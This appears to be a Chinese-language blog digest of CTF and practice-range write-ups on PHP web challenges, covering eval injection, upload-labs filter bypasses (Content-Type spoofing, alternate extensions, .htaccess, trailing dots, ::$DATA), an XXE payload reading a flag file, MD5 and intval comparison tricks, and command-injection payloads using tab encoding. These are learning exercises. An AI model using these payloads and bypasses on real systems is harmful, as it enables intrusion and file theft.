Php

php反序列化靶场做题 level 2 <?php /* --- HelloCTF - 反序列化靶场 关卡 2 : 类值的传递 --- HINT：尝试将flag传递出来~ # -*- coding: utf-8 -*- # @Author: 探姬 # @Date: 2024-07-01 20:30 # @Repo: github.com/ProbiusOfficial/PHPSerialize-labs # @email: admin@hello-ctf.com # @link: hello-ctf.com */ error_reporting(0); $flag_string = "NSSCTF{？？？？}"; class FLAG{ public $free_flag = "???"; function get_free_flag(){ echo $this->free_flag; } } $target = new FLAG(); $code = $_POST['code']; if(isset($code)){ eval($code); $target->get_free_flag(); } else{ highlight_file('source'); } 从上往下 可控点位于$code = $_POST['code'];flag位于$flag_string根据代码可以修改class中的$free_flag值为$flag_string ...

既在比赛中吃亏的时候就决定要再把这个靶场刷一边，当我还在寻思怎么绕过验证的时候队友就已经拿到webshell了，这个差距简直无法接受 pass-01 简单的js前端验证 约等于没有 过 pass-02 在源代码中关键点在与 if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) $_FILES这个超级数组是用于处理文件上传的信息的，其中包括客户端通过post传输的上传文件的文件信息，其中type这个字段是用于判断文件的类型，在流量包中体现为Content-Type:字段 将content-type修改为image/jpeg发包上传，成功 pass-03 在pass03的代码中他设置了一个黑名单并做了判定 $file_ext = strrchr($file_name, '.'); $deny_ext = array('.asp','.aspx','.php','.jsp'); if(!in_array($file_ext, $deny_ext)) 过滤掉了常见的脚本后缀，看似天衣无缝，但这个靶场使用的是apache的后端，而它其中存在一个配置文件httpd.conf 之中的AddType application/x-httpd-php .php .php3 .phtml语句用于告诉服务器将什么后缀的文件交予php解释器处理，这里除了php还有php3,phtml，这没有在代码的过滤器中 pass-04 这次过滤很严格 $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf"); 但还是在httpd.conf中，存在这样一条配置 AllowOverride All的作用是允许.htaccess 文件覆盖服务器的全局配置，这导致我们可以上传这个文件覆盖掉服务器配置文件，使得自定义的后缀被服务器的php解析 <IfModule mime_module> AddType application/x-httpd-php .boom </IfModule> 局限性：apache才存在，AllowOverride All默认关闭 pass-05 代码如下 $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess"); 发现了什么？过滤了hta，但就php没有过滤大小写 pass-06 第六题的代码中少了去除空格的一行代码 $file_ext = trim($file_ext); //首尾去空 而过滤中却没有，也就是可以构造php 来pass pass-07 这次提示直接说过滤了所有后缀 $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess"); 本次靶机使用的是windows，在windows中有一个特性，在后缀后面再加点这个点会被系统丢掉 利用这特性在后缀加点就可绕过 pass-08 pass8与前面的代码相比，少了一个::$DATA的过滤，其利用 NTFS 文件系统中的一个特性，替代数据流 (Alternate Data Streams, ADS) ...

好像有好多题目还没上传，现写上传了的 exx 经典带回显xxe漏洞 照抄payload： <?xml version="1.0"?> <!DOCTYPE as [ <!ENTITY f SYSTEM "file:///flag">]> <user><username>admin&f;</username><password></password></user> 值得注意的是，需要带file伪协议否则带不出来 百万美元的诱惑 源代码 <?php error_reporting(0); $a = $_GET['a']; $b = $_GET['b']; $c = $_GET['c']; if ($a !== $b && md5($a) == md5($b)) { if (!is_numeric($c) && $c > 2024) { echo "好康的"; } else { die("干巴爹干巴爹先辈~"); } } else { die("开胃小菜))"); } 重点是： if ($a !== $b && md5($a) == md5($b)) { if (!is_numeric($c) && $c > 2024) { 第一段做了一个判断，很明显需要做md5碰撞ab传参分别是a=QNKCDZO&b=240610708，第二个使用了is_numeric()函数判断不是数字的同时需要他大于2024，查了一下可以借url编码中的空字符绕过 最后得到 ?a=QNKCDZO&b=240610708&c=2025%20 得到一个文件名字./dollar.php，访问是下一模块 <?php //flag in 12.php error_reporting(0); if(isset($_GET['x'])){ $x = $_GET['x']; if(!preg_match("/[a-z0-9;`|#'\"%&\x09\x0a><.,?*\-=\\[\]]/i", $x)){ system("cat ".$x.".php"); } }else{ highlight_file(__FILE__); } ?> 看的出来通过preg_match过滤的大部分的字符，在网上查了一圈发现了一个神奇的方法，利用$()这三个字符就可以组成，逻辑大致如下 ...

登入挺迷惑的 账户是NSS，密码看了别人题解才知道 不难看出，重点代码是 if ($num != '12345') { if (intval($num) == '12345') { echo $FLAG; } 这里的判定用了intval函数，其常见与强制类型转换，转换时会忽略小数点，同时它的第二个参数可以缺省，也就是说这个函数能完成自动转化 对应关系为 0开头8进制 0x开头16进制 否则十进制 传入12345.123即可

https://www.nssctf.cn/problem/425 cookie修改 rce 空格绕过 进入题目可以把看到代码 将cookie设置为 admin=1 即可得到rasalghul.php访问阅读代码 代码只使用了preg_match("/ /", $ip)做了空格过滤可以使用%09（tab）来绕过，payload ?url=ls%09/ ?url=cat%09/flllllaaaaaaggggggg